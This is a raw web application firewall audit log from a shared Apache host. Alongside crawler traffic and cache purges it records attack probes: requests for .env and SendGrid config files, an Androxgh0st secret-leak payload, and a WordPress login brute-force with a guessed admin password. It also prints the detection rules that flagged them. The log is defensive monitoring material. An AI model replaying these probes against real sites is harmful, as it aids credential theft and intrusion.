.thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751361618353969 1032808 (- - -) Stopwatch2: 1751361618353969 1032808; combined=2176, p1=84, p2=1915, p3=0, p4=0, p5=176, sr=47, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --79d8a36a-Z-- --dbf53e79-A-- [01/Jul/2025:14:50:19.465763 +0530] aGOoU6DcWeeYlF783rJgXAAAACA 172.71.134.117 41594 192.168.74.40 80 --dbf53e79-B-- GET /.sendgrid/config HTTP/1.1 Host: kidc.co.in X-Real-IP: 185.177.72.115 X-Remote-IP: 172.71.134.117 x-forwarded-for: 185.177.72.115 cf-ray: 9584d3a92d4804a6-CDG accept-encoding: gzip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-visitor: {"scheme":"http"} -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --91efd835-Z-- --d2d4c65d-A-- [01/Jul/2025:14:53:09.775212 +0530] aGOo_W7A-iRb1G1E8ekG2gAAAAg 196.251.88.57 57929 192.168.74.40 80 --d2d4c65d-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --d2d4c65d-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --d2d4c65d-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751361789772333 3070 (- - -) Stopwatch2: 1751361789772333 3070; combined=862, p1=70, p2=432, p3=0, p4=0, p5=360, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d2d4c65d-Z-- --a5907362-A-- [01/Jul/2025:14:53:10.534906 +0530] aGOo_QHOJHvwH3-q7IVB3QAAAAQ 209.141.36.186 64600 192.168.74.40 443 --a5907362-B-- POST /wp-login.php HTTP/1.1 Host: carmictech.com Connection: keep-alive Accept-Encoding: none Accept: */* user-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Cookie: wordpress_test_cookie=WP%20Cookie%20check Content-Length: 137 Content-Type: application/x-www-form-urlencoded --a5907362-C-- log=admin&redirect_to=https%3A%2F%2Fcarmictech.com%2Fwp-admin%2F&wp-submit=Log%2BIn&testcookie=1&rememberme=forever&pwd=admin%21%40%23123 --a5907362-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Frame-Options: SAMEORIGIN -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --be09564b-Z-- --42d9c61d-A-- [01/Jul/2025:14:53:38.651307 +0530] aGOpGqcslz6Ubl5BP8KNowAAAAw 196.251.88.57 63024 192.168.74.40 80 --42d9c61d-B-- POST / HTTP/1.1 Host: 103.185.74.40 User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 20 Content-Type: application/x-www-form-urlencoded --42d9c61d-C-- 0x%5B%5D=androxgh0st --42d9c61d-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --42d9c61d-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "280"] [id "77317941"] [msg "IM360 WAF: Laravel Apps Leaking Secrets exploit attempt||MV:androxgh0st||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P:0x[]=androxgh0st& F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751361818644778 6902 (- - -) Stopwatch2: 1751361818644778 6902; combined=1799, p1=142, p2=1179, p3=0, p4=0, p5=478, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --42d9c61d-Z-- --5a424d30-A-- [01/Jul/2025:14:53:39.508260 +0530] aGOpG4ueHxkhHQ8o_pvhhgAAACI 20.171.207.232 47958 192.168.74.40 443 --5a424d30-B-- GET /aaina/images/rajasthan-tours-from-ahmedabad/js/js/Rajasthan-Travel-Guides/https/https/aainag/hotels-jaisalmer.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --5a424d30-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5a78d832-Z-- --44824942-A-- [01/Jul/2025:15:07:04.548501 +0530] aGOsQC5fKkPFpO3QXgpzXgAAABU 43.135.145.117 41910 192.168.74.40 80 --44824942-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --44824942-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --44824942-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751362624540848 8015 (- - -) Stopwatch2: 1751362624540848 8015; combined=4428, p1=111, p2=4002, p3=138, p4=2, p5=175, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --44824942-Z-- --dcb3a603-A-- [01/Jul/2025:15:07:04.784627 +0530] aGOsQBoY-vFMIpaMXLUedwAAAAg 20.171.207.232 57822 192.168.74.40 443 --dcb3a603-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/https/js/Rajasthan-Travel-Guides/hotels-in-rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --dcb3a603-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --dcb3a603-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/https/js/Rajasthan-Travel-Guides/hotels-in-rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751363170415984 14879 (- - -) Stopwatch2: 1751363170415984 14879; combined=3717, p1=127, p2=3411, p3=0, p4=0, p5=179, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --04f3e668-Z-- --ebe8dd7c-A-- [01/Jul/2025:15:16:11.434618 +0530] aGOuYMqRjdU6FkXGN-Q5xwAAADQ 103.185.74.40 51464 192.168.74.40 443 --ebe8dd7c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --ebe8dd7c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ebe8dd7c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751363168111211 3323723 (- - -) Stopwatch2: 1751363168111211 3323723; combined=1673, p1=64, p2=1456, p3=0, p4=0, p5=152, sr=44, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ebe8dd7c-Z-- --ad061622-A-- [01/Jul/2025:15:16:11.555130 +0530] aGOuY_ICddmJieiL-nwOWwAAAAk 20.171.207.232 39962 192.168.74.40 443 --ad061622-B-- GET /aaina/images/rajasthan-tours-from-ahmedabad/js/aainag/https/Rajasthan-Travel-Guides/aainag/aainag/Car-Rentals.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --ad061622-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ad061622-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751363172694486 17683 (- - -) Stopwatch2: 1751363172694486 17683; combined=3995, p1=195, p2=3635, p3=0, p4=0, p5=165, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --b6ed3a1c-Z-- --04523722-A-- [01/Jul/2025:15:16:12.984782 +0530] aGOuYwTJ5UE2p5NtCIabbQAAABM 103.185.74.40 51216 192.168.74.40 443 --04523722-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --04523722-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --04523722-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751363171644260 1340781 (- - -) Stopwatch2: 1751363171644260 1340781; combined=2395, p1=81, p2=2126, p3=0, p4=0, p5=188, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --04523722-Z-- --0db50b7a-A-- [01/Jul/2025:15:16:13.359656 +0530] aGOuZcqRjdU6FkXGN-Q5yQAAADQ 57.141.0.21 36124 192.168.74.40 443 --0db50b7a-B-- GET /rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/rajasthan-tours-from-agra/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/images/testimonials/Rajasthan-Travel-Guides/Ahmedabad-City-Guide.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --0db50b7a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0db50b7a-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366356199668 16499251 (- - -) Stopwatch2: 1751366356199668 16499251; combined=2599, p1=100, p2=2287, p3=0, p4=0, p5=212, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --3b5d9c09-Z-- --dcf1b603-A-- [01/Jul/2025:16:09:32.797292 +0530] aGO64LDDlaQg_h4k_0IC2wAAAEQ 103.185.74.40 52952 192.168.74.40 443 --dcf1b603-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --dcf1b603-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --dcf1b603-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366368100445 4698053 (- - -) Stopwatch2: 1751366368100445 4698053; combined=4050, p1=249, p2=3556, p3=0, p4=0, p5=245, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --dcf1b603-Z-- --21042a3a-A-- [01/Jul/2025:16:09:32.798729 +0530] aGO61UR75m7sGJLgF1guGgAAAB4 168.220.247.75 54158 192.168.74.40 443 --21042a3a-B-- GET /blog/2022/11/ HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US Accept-Charset: windows-1252,utf-8;q=0.7,*;q=0.7 Host: www.ganpatiengineering.com Cookie: a=1 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366360291658 13706297 (- - -) Stopwatch2: 1751366360291658 13706297; combined=3062, p1=154, p2=2770, p3=0, p4=0, p5=138, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7573e833-Z-- --fae25f4a-A-- [01/Jul/2025:16:09:34.106690 +0530] aGO65bIvMnT0qKvAkirV7wAAAAI 103.185.74.40 32614 192.168.74.40 443 --fae25f4a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --fae25f4a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --fae25f4a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366373009785 1097022 (- - -) Stopwatch2: 1751366373009785 1097022; combined=2405, p1=97, p2=2122, p3=0, p4=0, p5=186, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --fae25f4a-Z-- --8a5c535e-A-- [01/Jul/2025:16:09:34.201527 +0530] aGO62eLirzGqE_62bRLhywAAAAU 168.220.247.75 54156 192.168.74.40 443 --8a5c535e-B-- GET /blog/2013/11/ HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US Accept-Charset: windows-1252,utf-8;q=0.7,*;q=0.7 Host: www.ganpatiengineering.com Cookie: a=1 -- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:GET||Perf all:combined=3570, p1=146, p2=3308, p3=112, p4=4, p5=0, sr=63, sw=0, l=0, gc=0||Py scan:8688||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751366439168391 10107 (- - -) Stopwatch2: 1751366439168391 10107; combined=3830, p1=146, p2=3308, p3=112, p4=4, p5=260, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --610d776f-Z-- --e8268173-A-- [01/Jul/2025:16:10:39.432600 +0530] aGO7JQsqiLIDvd_VHyMLOQAAAAw 103.185.74.40 59096 192.168.74.40 443 --e8268173-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --e8268173-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e8268173-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366437642371 1790889 (- - -) Stopwatch2: 1751366437642371 1790889; combined=3914, p1=145, p2=3624, p3=0, p4=0, p5=145, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --e8268173-Z-- --bc48086d-A-- [01/Jul/2025:16:10:40.352120 +0530] aGO7KBIxoiRG6O-Rg6RnfgAAAAA 43.166.244.192 57114 192.168.74.40 443 --bc48086d-B-- GET /single.php?id=129 HTTP/1.1 Host: arsportyhealthcareer.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366440619678 14971 (- - -) Stopwatch2: 1751366440619678 14971; combined=3229, p1=169, p2=2891, p3=0, p4=0, p5=169, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2dafec50-Z-- --eeb8f32f-A-- [01/Jul/2025:16:10:40.925684 +0530] aGO7JwsqiLIDvd_VHyMLOgAAAAw 103.185.74.40 32335 192.168.74.40 443 --eeb8f32f-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --eeb8f32f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --eeb8f32f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against 
"MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366439642606 1283882 (- - -) Stopwatch2: 1751366439642606 1283882; combined=3543, p1=94, p2=3272, p3=0, p4=0, p5=177, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --eeb8f32f-Z-- --e41e6129-A-- [01/Jul/2025:16:10:41.796676 +0530] aGO7KYXPJkPFcd-dlfZjHwAAACw 20.171.207.232 58200 192.168.74.40 443 --e41e6129-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/https/images/rajasthan-tours-from-udaipur/Car-Rentals-Agra.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --e41e6129-F-- -- Action: Intercepted (phase 2) Stopwatch: 1751366869558082 7839 (- - -) Stopwatch2: 1751366869558082 7839; combined=3880, p1=122, p2=3283, p3=0, p4=0, p5=475, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --2419f374-Z-- --8dde0d79-A-- [01/Jul/2025:16:17:50.379502 +0530] aGO80wV2uuWMs7i56tYQHgAAAC8 103.185.74.40 57094 192.168.74.40 443 --8dde0d79-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --8dde0d79-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8dde0d79-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366867547536 2832539 (- - -) Stopwatch2: 